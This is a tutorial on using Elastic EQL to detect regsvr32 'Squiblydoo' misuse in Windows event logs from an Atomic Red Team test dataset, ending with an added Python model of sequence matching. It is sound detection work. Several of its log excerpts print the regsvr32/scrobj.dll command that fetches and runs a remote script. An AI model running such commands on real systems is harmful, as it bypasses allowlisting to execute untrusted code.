Example: Detect threats with EQL
Elastic Stack Serverless
This example tutorial shows how you can use EQL to detect security threats and other suspicious behavior. In this scenario, you are tasked with detecting regsvr32 misuse in Windows event logs.
regsvr32.exe is a built-in command-line utility used to register .dll libraries in Windows. As a native tool, regsvr32.exe has trusted status, which lets it bypass most allowlisting software and script blockers. Attackers with access to a user's command line can use regsvr32.exe to run malicious scripts via .dll libraries, even on machines that otherwise disallow such scripts.
One common variant of regsvr32 misuse is the Squiblydoo attack. In a Squiblydoo attack, a regsvr32.exe command uses the scrobj.dll library to register and run a remote script. These commands often look like this:
"regsvr32.exe /s /u /i:<script-url> scrobj.dll"
This tutorial uses a test dataset from Atomic Red Team that includes events imitating a Squiblydoo attack. The data has been mapped to Elastic Common Schema (ECS) fields.
Get started
To get started:
- Create an index template with data streams enabled:
PUT /_index_template/my-data-stream-template
{
  "index_patterns": [ "my-data-stream*" ],
  "data_stream": { },
  "priority": 500
}
- Use the bulk API to index the data into a matching stream:
curl -H "Content-Type: application/json" -XPOST "localhost:9200/my-data-stream/_bulk?pretty&refresh" --data-binary "@normalized-T1117-AtomicRed-regsvr32.json"
- Use the cat indices API to verify that the data was indexed:
GET /_cat/indices/my-data-stream?v=true&h=health,status,index,docs.count
The response should show a docs.count of 150:
health status index                                docs.count
yellow open   .ds-my-data-stream-2099.12.07-000001 150
First, get a count of events associated with a regsvr32.exe process:
GET /my-data-stream/_eql/search?filter_path=-hits.events
{
"query": """
any where process.name == "regsvr32.exe"
""",
"size": 200
}
- ?filter_path=-hits.events excludes the hits.events property from the response. This search is only intended to get an event count, not a list of matching events.
- The query matches any event with a process.name of regsvr32.exe.
- "size": 200 returns up to 200 hits for matching events.
The response returns 143 related events:
{
"is_partial": false,
"is_running": false,
"took": 60,
"timed_out": false,
"hits": {
"total": {
"value": 143,
"relation": "eq"
}
}
}
The regsvr32.exe process is associated with 143 events. But how was regsvr32.exe initially called, and who called it? regsvr32.exe is a command-line utility, so narrow your results to processes that used the command line:
GET /my-data-stream/_eql/search
{
"query": """
process where process.name == "regsvr32.exe" and process.command_line.keyword != null
"""
}
The query matches one event with an event.type of creation, indicating the start of a regsvr32.exe process. Based on the event's process.command_line value, regsvr32.exe used scrobj.dll to register the script RegSvr32.sct. This fits the behavior of a Squiblydoo attack.
{
...
"hits": {
"total": {
"value": 1,
"relation": "eq"
},
"events": [
{
"_index": ".ds-my-data-stream-2099.12.07-000001",
"_id": "gl5MJXMBMk1dGnErnBW8",
"_source": {
"process": {
"parent": {
"name": "cmd.exe",
"entity_id": "{42FC7E13-CBCB-5C05-0000-0010AA385401}",
"executable": "C:\\Windows\\System32\\cmd.exe"
},
"name": "regsvr32.exe",
"pid": 2012,
"entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
"command_line": "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll",
"executable": "C:\\Windows\\System32\\regsvr32.exe",
"ppid": 2652
},
"logon_id": 217055,
"@timestamp": 131883573237130000,
"event": {
"category": "process",
"type": "creation"
},
"user": {
"full_name": "bob",
"domain": "ART-DESKTOP",
"id": "ART-DESKTOP\\bob"
}
}
}
]
}
}
Check whether regsvr32.exe later loads the scrobj.dll library:
GET /my-data-stream/_eql/search
{
"query": """
library where process.name == "regsvr32.exe" and dll.name == "scrobj.dll"
"""
}
The query matches one event, confirming that scrobj.dll was loaded:
{
...
"hits": {
"total": {
"value": 1,
"relation": "eq"
},
"events": [
{
"_index": ".ds-my-data-stream-2099.12.07-000001",
"_id": "ol5MJXMBMk1dGnErnBW8",
"_source": {
"process": {
"name": "regsvr32.exe",
"pid": 2012,
"entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
"executable": "C:\\Windows\\System32\\regsvr32.exe"
},
"@timestamp": 131883573237450016,
"dll": {
"path": "C:\\Windows\\System32\\scrobj.dll",
"name": "scrobj.dll"
},
"event": {
"category": "library"
}
}
}
]
}
}
In many cases, attackers use malicious scripts to connect to remote servers or download other files. Use an EQL sequence query to check for the following series of events:
- A regsvr32.exe process
- A load of the scrobj.dll library by the same process
- Any network event by the same process
Based on the command line value seen in the previous response, you can expect to find a match. However, this query is not designed for that specific command. Instead, it looks for a pattern of suspicious behavior that is generic enough to detect similar threats.
GET /my-data-stream/_eql/search
{
"query": """
sequence by process.pid
[process where process.name == "regsvr32.exe"]
[library where dll.name == "scrobj.dll"]
[network where true]
"""
}
The query matches one sequence, indicating that the attack likely succeeded:
{
...
"hits": {
"total": {
"value": 1,
"relation": "eq"
},
"sequences": [
{
"join_keys": [
2012
],
"events": [
{
"_index": ".ds-my-data-stream-2099.12.07-000001",
"_id": "gl5MJXMBMk1dGnErnBW8",
"_source": {
"process": {
"parent": {
"name": "cmd.exe",
"entity_id": "{42FC7E13-CBCB-5C05-0000-0010AA385401}",
"executable": "C:\\Windows\\System32\\cmd.exe"
},
"name": "regsvr32.exe",
"pid": 2012,
"entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
"command_line": "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll",
"executable": "C:\\Windows\\System32\\regsvr32.exe",
"ppid": 2652
},
"logon_id": 217055,
"@timestamp": 131883573237130000,
"event": {
"category": "process",
"type": "creation"
},
"user": {
"full_name": "bob",
"domain": "ART-DESKTOP",
"id": "ART-DESKTOP\\bob"
}
}
},
{
"_index": ".ds-my-data-stream-2099.12.07-000001",
"_id": "ol5MJXMBMk1dGnErnBW8",
"_source": {
"process": {
"name": "regsvr32.exe",
"pid": 2012,
"entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
"executable": "C:\\Windows\\System32\\regsvr32.exe"
},
"@timestamp": 131883573237450016,
"dll": {
"path": "C:\\Windows\\System32\\scrobj.dll",
"name": "scrobj.dll"
},
"event": {
"category": "library"
}
}
},
{
"_index": ".ds-my-data-stream-2099.12.07-000001",
"_id": "EF5MJXMBMk1dGnErnBa9",
"_source": {
"process": {
"name": "regsvr32.exe",
"pid": 2012,
"entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
"executable": "C:\\Windows\\System32\\regsvr32.exe"
},
"@timestamp": 131883573238680000,
"destination": {
"address": "151.101.48.133",
"port": "443"
},
"source": {
"address": "192.168.162.134",
"port": "50505"
},
"event": {
"category": "network"
},
"user": {
"full_name": "bob",
"domain": "ART-DESKTOP",
"id": "ART-DESKTOP\\bob"
},
"network": {
"protocol": "tcp",
"direction": "outbound"
}
}
}
]
}
]
}
}
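To make the semantics of `sequence by process.pid` concrete, here is an added Python re-implementation of the three-stage sequence above, run locally over a handful of constructed ECS-style events instead of against Elasticsearch. It is example code written for this page, not part of Elastic's EQL engine or the Atomic Red Team dataset; the pid 3001 events are invented as a benign regsvr32 run, and the field layout is a flattened simplification of the documents shown in the responses.

```python
"""Simplified local model of the tutorial's EQL sequence query."""
from typing import Callable, Dict, List, Tuple

Event = Dict[str, object]

# Constructed sample events. pid 2012 mirrors the tutorial's Squiblydoo chain
# (timestamps taken from the page, listed deliberately out of order); pid 3001
# is an invented benign regsvr32 run that loads a different DLL before a
# network event and therefore must NOT match.
SAMPLE_EVENTS: List[Event] = [
    {"@timestamp": 131883573238680000, "category": "network", "pid": 2012,
     "process_name": "regsvr32.exe", "dll_name": None},
    {"@timestamp": 131883573237130000, "category": "process", "pid": 2012,
     "process_name": "regsvr32.exe", "dll_name": None},
    {"@timestamp": 131883573237450016, "category": "library", "pid": 2012,
     "process_name": "regsvr32.exe", "dll_name": "scrobj.dll"},
    {"@timestamp": 131883573237200000, "category": "process", "pid": 3001,
     "process_name": "regsvr32.exe", "dll_name": None},
    {"@timestamp": 131883573237300000, "category": "library", "pid": 3001,
     "process_name": "regsvr32.exe", "dll_name": "mshtml.dll"},
    {"@timestamp": 131883573237400000, "category": "network", "pid": 3001,
     "process_name": "regsvr32.exe", "dll_name": None},
]

# The three stages of the tutorial's sequence, one predicate per [ ... ] block.
SQUIBLYDOO_STAGES: List[Callable[[Event], bool]] = [
    lambda e: e["category"] == "process" and e["process_name"] == "regsvr32.exe",
    lambda e: e["category"] == "library" and e["dll_name"] == "scrobj.dll",
    lambda e: e["category"] == "network",
]


def match_sequences(events: List[Event], stages: List[Callable[[Event], bool]],
                    join_key: str = "pid") -> List[Tuple[object, List[Event]]]:
    """Return (join value, matched events) for every completed sequence.

    Simplified EQL semantics: events are walked oldest first, each join-key value
    keeps its own position in the stage list, and a stage advances only when the
    next event for that key satisfies the next predicate. Events that match no
    stage are skipped, as EQL does without an `until` or `with maxspan` clause.
    Unlike real EQL, only one partial sequence per key is tracked at a time.
    """
    progress: Dict[object, List[Event]] = {}
    matches: List[Tuple[object, List[Event]]] = []
    for event in sorted(events, key=lambda e: e["@timestamp"]):
        partial = progress.setdefault(event[join_key], [])
        if stages[len(partial)](event):
            partial.append(event)
            if len(partial) == len(stages):
                matches.append((event[join_key], partial))
                progress[event[join_key]] = []  # look for a fresh sequence
    return matches
```

Feeding the page's own pid 2012 events back in out of timestamp order still yields the single match because the join is done after sorting, which is the property the `sequences` response above relies on.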